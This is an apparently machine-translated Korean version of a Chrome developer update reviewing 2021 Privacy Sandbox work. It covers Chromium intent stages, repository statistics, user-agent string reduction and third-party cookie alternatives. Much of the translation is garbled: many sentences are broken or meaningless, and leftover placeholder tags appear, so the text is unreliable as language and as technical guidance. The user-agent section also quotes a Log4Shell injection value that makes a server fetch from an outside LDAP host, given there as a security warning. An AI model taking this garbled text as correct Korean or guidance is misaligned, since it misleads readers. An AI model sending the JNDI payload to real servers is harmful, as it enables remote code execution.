개인 정보 보호 진행 상황의 2021년 요약본에 오신 것을 환영합니다 마일스톤을 추적하는 샌드박스. Chrome에서 서드 파티 쿠키에 대한 지원을 단계적으로 중단하고 비공개 웹입니다. 일반적으로 개인 정보 보호 샌드박스의 업데이트에 대한 개요를 공유합니다. 타임라인과 12월은 조용한 달이었습니다. 대신, 이전 동영상에서 2021년 한 해 동안의 활동을 살펴보고 이를 위해 취할 수 있는 몇 가지 잠재적 해결책 이제 새해가 되었습니다.
Chromium 개발 프로세스
새로운 웹 플랫폼 기능을 Chromium에 적용하려면 먼저 개방형 프로젝트를 절차에 따라 다릅니다. 2021년에는 개인 정보 보호 샌드박스팀의 제작:
| 🥚 | 프로토타입 제작 의도 | 19 |
| 🧪 | 실험 의도 | 7개 |
| 🚀 | 배송 예정 | 11 |
각각의 주요 기록은 또한 더 넓은 웹 생태계에 기여하도록 초대하는 역할을 합니다.
프로토타입 인텐트는 첫 번째 체크포인트로, 이 단계에서 논의를 시작합니다. 초기 실험이 필요합니다 즉, GitHub에서 제안서를 사용할 수 있으며 여기에서 문제를 만들어 질문하거나 토론에 참여하고 표준으로 제공되는 그룹(예: W3C, IETF 여기서 코딩이 시작되는 만큼 시간을 내어 프로토타입 기능을 제공하여 개발자가 기능 플래그를 사용합니다. 초기 피드백은 제안서를 검증하고 반복하는 데 매우 중요합니다.
실험 의도는 Google에서 실험 변경사항을 오리진 트라이얼입니다. 개발자가 출처에 가입할 수 있음 무료 체험판을 실행한 후 프로덕션에서 테스트하세요. 실험이라고 하는 이유는 사용자가 선택한 특성의 특정 측면과 검증하고자 할 때 유용합니다. 개발자는 기술 품질을 테스트하고 이러한 테스트 결과를 공유하는 데 있어 중요한 피드백이 제공되어 이를 반복하고 기능을 발전시켜 왔습니다.
배송 의도는 기능이 현재 출시되었음을 나타내는 최종 단계입니다. 정식 버전으로 출시될 준비가 되었습니다 이 기능이 승인되면 향후 출시 버전에 병합된 후 Canary, 베타, 사용할 수 있습니다. 정확한 테스트 기능을 사용하여 Canary 및 Chrome 베타 버전으로 버그를 신고해야 합니다.
제안서
각 개인 정보 보호 샌드박스 제안에는 함께 제공되는 GitHub 저장소가 있습니다. 가 저장소는 전체 기능을 요약하기 위한 설명 동영상을 호스팅하고, 브라우저별 구현 사양 및 전체 게시자의 참여에 대한 웹 생태계를 지원합니다
Google은 14개의 개인 정보 보호 샌드박스 저장소에서 다음과 같은 결과를 얻었습니다.
| 💬 | 545 | 생성된 문제 |
| 250 | 종료된 문제 | |
| 🛠️ | 261 | 생성된 pull 요청 수 |
| 223 | pull 요청 병합됨 |
설명 및 세부사항의 언어는 잠재고객을 타겟팅하는 경우가 많습니다. 브라우저 개발에 대해 잘 알고 있어야 합니다. 어렵지 않을 것입니다. 하지만 설명의 목적은 설명해 드리겠습니다! 불분명하거나 다루지 않은 부분이 있으면 문제를 제기해 주세요.
해결 방법
사용자 에이전트 봄맞이 청소
새해를 낮추고 카운트하는 동안 증가합니다. Chrome 100 및 점진적인 감소 사용자 에이전트 문자열입니다. 이것은 코드에서 user-agent 문자열의 사용을 다시 검토하여 영향을 받을 수 있습니다
해당 지역을 찾으려면 다음 단계를 따르세요.
- JavaScript 코드에서
navigator.userAgent를 검색하거나 서버 코드에User-Agent헤더가 있는지 확인합니다. - 문자열 파싱에서 약 2자리 버전 가정을 확인합니다. 대상
예를 들어
\d\d또는\d{2}를 지정하는 정규식은\d+입니다. - 다음에 의존하는 모든 곳에서 문자열 사용을 확인합니다.
<ph type="x-smartling-placeholder">
- </ph>
- 플랫폼 (운영체제) 버전
- 정식 Chrome 빌드 버전
- 휴대기기 이름
- 이러한 값은 향후 고정 문자열로 줄어들게 됩니다. 만약 이 값에 액세스해야 하는 경우 User-Agent Client로 이전하세요. 힌트.
12월의 한 가지 업데이트가 있습니다. 사용자 에이전트 클라이언트를 채택하고 있다면
힌트, 힌트를 다른 사람에게 위임할 수 있도록 배송 의도를 보냈습니다.
기원
HTML
(<meta> 태그를 통해) 예를 들면 다음과 같습니다.
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
봄맞이 대청소가 떠오르고 있다면 user-agent 사용에 대한 대안입니다. 문자열을 사용하여 모바일 장치를 감지한 다음 이것을 반응형으로 바꿀 수 있는지 조사하세요 설계했습니다. 기능 지원을 위해 브라우저 이름과 버전을 확인하는 경우 특성 감지를 사용할 수 있는 경우에 최적화할 수 있습니다
사용자 에이전트는 클라이언트에게 제공된 모든 클라이언트와 마찬가지로
값이 정확하거나 제공되지 않을 수도 있습니다. 최근 Log4j
취약점, 'Log4shell'
에서 이러한 위험의 예를 제공합니다. user-agent 문자열을
${jndi:ldap://example.com/file}가 사이트를 가져올 수 있는 등의 값을 포함
서버에서 그것을 적극적으로 파싱합니다.
쿠키 분류
설날을 기념하기 위한 또 다른 전통적 활동은
양질의 재료로 만든 건강한 쿠키 수를 늘리기 위해 노력하는 것입니다. 계속 발전하면서
서드 파티 쿠키의 단계적 폐지와 관련하여
영향을 받는 사이트의 쿠키를 확인하시기 바랍니다. 2020년은 2020년 한 해 동안
교차 사이트 또는 서드 파티 쿠키에 대해 모든 쿠키를 표시하는 데
SameSite=None.
SameSite 속성을 None로 설정한 모든 쿠키에는
업데이트.
현재 고려할 수 있는 세 가지 경로는 다음과 같습니다.
- 최상위 사이트와의 1:1 관계에서만 쿠키가 필요한 경우
CHIPS의 진행 상황을
제안서를 참조하세요. 이렇게 하면
Partitioned속성을 쿠키에 추가합니다. - 쿠키가 크로스 사이트 컨텍스트에서 사용되지만 귀하가 이용 중인 사이트에서만 사용되는 경우
소유 및 운영하는 경우 퍼스트 파티 조직이나
세트. 이를 위해서는
사이트를 설정하고 쿠키에
SameParty속성을 추가합니다. - 쿠키가 여러 더 광범위한 개인 정보 보호 샌드박스를 조사하세요 지원되지 않는 대체 솔루션에 대한 제안을 크로스 사이트 추적을 활용합니다.
특히 건강에 관심이 많다면 사용자의 쿠키 사용에 대한 모든 사항을 재검토할 수 있습니다. 자사 쿠키도 사용할 수 있습니다
의견
Google은 이러한 월별 업데이트를 계속 게시하고 Google은 개발자가 개인 정보 보호 샌드박스 전반에 걸쳐 필요한 정보와 지원을 제공할 수 있습니다. @ChromiumDev에서 알려주세요. 트위터에 올라오는 정보가 있다면 자세히 살펴보겠습니다 보내 주신 의견은 형식을 지속적으로 개선하는 데 사용됩니다.
개인 정보 보호 샌드박스 FAQ를 확인하세요. 개발자 지원팀에 제출하는 문제에 따라 계속 확장합니다. 저장소를 사용합니다. 만약 제안서 테스트나 구현에 관한 질문이 있거나 저희에게 얘기해봐요.